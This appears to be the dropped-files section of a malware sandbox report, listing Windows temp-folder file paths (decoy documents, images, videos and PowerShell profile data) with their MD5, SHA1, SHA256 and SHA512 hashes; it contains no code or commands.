SHA512 140aaf37fb367b75cf060c527b3a102bd9cd58b72a3be4b44340e23734b003cda09950d82c2b0d7ae7e2ef04432e5d99e48df6392334785abe0dccce9cf72579

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\InvokeCompare.doc

MD5 18c163a72fa52955922f3962566add2f
SHA1 336be80c4c2e37aaa491b605f788c8c282b51a0d
SHA256 2901d7839cce520b20fd6adcbf11e1e4699c4b7bbb1ba96f2c90b5edc8e24dcc
SHA512 d3fef06e64591379675cf7894dc601115d773f4760246b29b4d141cfd4df61782bff5dccfe7dcec59b4080b7e56e75053e40c42d4005b54633875870df7bcc0e

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\ConvertSearch.pdf

MD5 aa5c41a73274c6248c2dd7de1008c23d
SHA1 93f892786d0c941f563eeb291345aa5bd33c1a60
SHA256 b4922be71162f6a46031502f3ce5e749e8e4344deeaf95bd4d360f3d8300c434
SHA512 b80e35286c8717963231b017f43c304144782ee9d8927179e4bd5c78f7d6807a12e89f1a4f09b54014d8ac0167f7939e548637effab2d42efec24257ec751c54

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\BackupRedo.dotm

MD5 8f5192880827b52c7c1256c6a9d2b3fc
SHA1 10795e08711ee6b7ea8f4dd42560e9976441a29b
SHA256 1345c189b83d628a3bfa4cef59125f0fb4b2449b8103a5e525de3802fb4a6585
SHA512 d4a858f909c17706383a0660abf5d8d274e1a6d550f8a64f04fcd959ba57e586286602dce246c4a8a186ea0491aaa407da27d7934582715443804fc31e00e927

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\HideEnable.jpg

MD5 9902e3e8822014cd6b432fc8c33ede6d
SHA1 b84b12b49040dcae9b01af46130e42e662373fe8
SHA256 bda70476390b6499e5c07de727fcfe864a1f349df6c75549aa2e9e24fc96cb0b
SHA512 f30d236ad69a9b92641dae890584de958b19b62fc915c9cc6f8af693bde5338b56001c89ceb22ef9bc5f94967fe5f4ba4b6707584076986e40ae629bd04af0a0

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\RegisterLock.mp4

MD5 748c20c40aaab0453f6d7884ecc493d0
SHA1 cf80a2ca6d7413c84e8f3d59c9b709bee8294e3f
SHA256 50402df553f262bcde1f61d6ed820616195136b5964ca5151d906dbfd31be94c
SHA512 9776df6747717cdeeb1d8fe4ad3cb52d19d01dd4edc7190a2faf1a0c6ebc225f7a2d6a454fd2711a2bd36831d9975834e7530f5b1877b7462482baffdc6b58c4

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\ResolveRestart.jpg

MD5 6d35d94692fd2383ec6d1fde35b180e5
SHA1 9159ec10281a1626e5af5190066de87ecc10a696
SHA256 ead01ee6bc5e0874b4ca83d597071a1fbd6ea94a315a99f69c1075ddcd1d8612
SHA512 3611f85fb99c48480752a8d83cebfe4a151c641b81c972891b1851cec15c66373d7752f2afc28a252ed4b97b3ecb50543556afe87afcc608cf171b62982dfe48

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\SubmitJoin.xlsx

MD5 eef09c57a4786c4ed653f20868052051
SHA1 940960de35f756ea7f2a6f7f0b743bbbada9ba97
SHA256 72777d69e2c64e83e4a78a11ab3735b334bdebb49506b62e730f1476c3ff3825
SHA512 e29c0f097a10af69978062f5932ba3f35c84a66c3caf37b5cc84562324182a4bdb40386867b1364b77a1b33eed036902f01c213a86c560b140a49da5ef416478

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\UnpublishBackup.jpeg

MD5 8bad27c866bc8d65165d71daedfcce37
SHA1 bafb439c6afcd4a55fb1acb18e15f82e21c9303f
SHA256 32b9207cca149f556b30dc560d07d7bae85c4ecff020682a6f528b183bfcf1c0
SHA512 91f376794d8d76b96c6ad0a240cddc5e45bb4fed167223eb0b407f5e24fd270da0a584ab6d4039c673f41ca75e4bffbabda0120987ae39d0103644618dafa458

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\DisableMount.mp4

MD5 d0929c6508334d92ed0e3152bb59776a
SHA1 1eaf58545544791d408b58a57041c077e8f7c77d
SHA256 3040959906c8b28d9b7ef47684ed71ba8ef9d9e435e543a0acbc64bedf59d9c2
SHA512 aff8d100fc54d10e928a7a0716e9e9dc9e7a43f84314c6fa3d9bc14a0420c5627ab94523a282d6db063ac05eab6397109032cceb6b676946590b092f794a1b26

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\NewResize.jpg

MD5 eb53dfca6b13456bb12d38d3615a8ed2
SHA1 8e39efdd6c4dab9ea54f10073dfcac3b75be5915
SHA256 248e12cf25600068ade8f29abc025f54462037ca6bdd5d124c85d8f5727a49b0
SHA512 a90995725577382ce93f307a3d584d2c8849200572d3801f8712c1cbaab15a2b20b74b646088a50fd1155fea8910a8c0aac0a163e9a33f2d66cf3f9087d76dce

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\ProtectCheckpoint.mp4

MD5 d74338f91d0651074d1bc2c5b2d53aba
SHA1 a0a6f4630794e2c5713559c01f65d96713be4b99
SHA256 38ced87980821ebda79150ebe0493b6487aeb4714f2645090034de05f7f9e57b
SHA512 1607c8b191de3efd53638ba056187761c8d9f32db66c32b5c752d094d2b30be7510b4996c8fcedfe4c68c1e2ee210461e448fcfb515545b2a10bf2d5b082e6a3

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\RestoreDisable.mp4

MD5 ef1bf503c259c8d0e849c3b045eb2442
SHA1 ee9f46991462bcee01debec4e8f17629eda25f96
SHA256 da8220e654de88e11d69c739b2d85d8666b275e5d8c51626fc15cd89e6715607
SHA512 a4ff28b2528b234a4ce111b4a08c075cc7fec36d96660149320506f03befb71444b68a5a961c083cbf00cf6a88265f4761d1bc05ed199a2cad44a6278a60a786

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\JoinLimit.png

MD5 f66bff7c5039ed0f4ed01f73fcd50950
SHA1 fb2428032374041055b0f4cde87f7ab6aee23def
SHA256 9e795d9f7e6e85b67e98a1e9f82d14c9c5de26abdc8bfa633416b9e198114953
SHA512 83c8a428fc84b7fd751e49f20dc1a6ce042e9d8e69bb574c0c18476fde5d593acae4ed9f73d0d8e3ef7e4537151b2a05108215a9da6905053dc265ee18fd8252

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\MoveBackup.dwg

MD5 878c8ad3561fd38978385f93f7b51c8e
SHA1 c7e2f23a7c59f5c197fffc14204b563555c1089a
SHA256 35193e09f65c1d30f97ff3d36e90f2cbe7bd9b063378bd0d4413aad39b4332c9
SHA512 9ed9ff227b6f377a78f774b3ff8fc624e5bb74d7d9cfc71f9fb997a3ac9151b1fccb3277265258a9fc8fd38cb20a78c1fa589d6f0e802b69ecda3dec3715fd1c

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\ExportHide.png

MD5 7b0960314b85ab5e1fdb5432170f9a60
SHA1 44d55fc17ec7f99f0aca242fb71b9fd695814ca1
SHA256 e08f6e04ae681320cb7af47c7f18e327b9a81ad56626b7f33e6bd1d2ef0a5c26
SHA512 5dd140618cce78406afb0a2949ed9e9658e4d48cc29a0308a846c086a5171320f31484456327ccc363ec40142db33e6603fe4962cfbd642263796cfb1210b040

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b2f8b5bf54e10ae4d93a2eac002cb497
SHA1 eccc3cd33596075bf413e4249c1f2491b1b2a6c7
SHA256 44e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d
SHA512 58c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ccf1b703c8f1f34a2faf84a676e0ef0c
SHA1 46dc045aa7dcf8938c0352d4125e796d38c4b7a3
SHA256 789e5eaacf5284c772fd75aab4c445eadff4816410167eea41a185ffe35b36fa
SHA512 c53f8516e7e65f86a0cba52ba2a7aa5c9e0bee4285b6cae525a0c1202d04f779a20225a6b8f8e674daf1ab9b4b225b3ebb7cda7588b3ab062761b136eb86b24a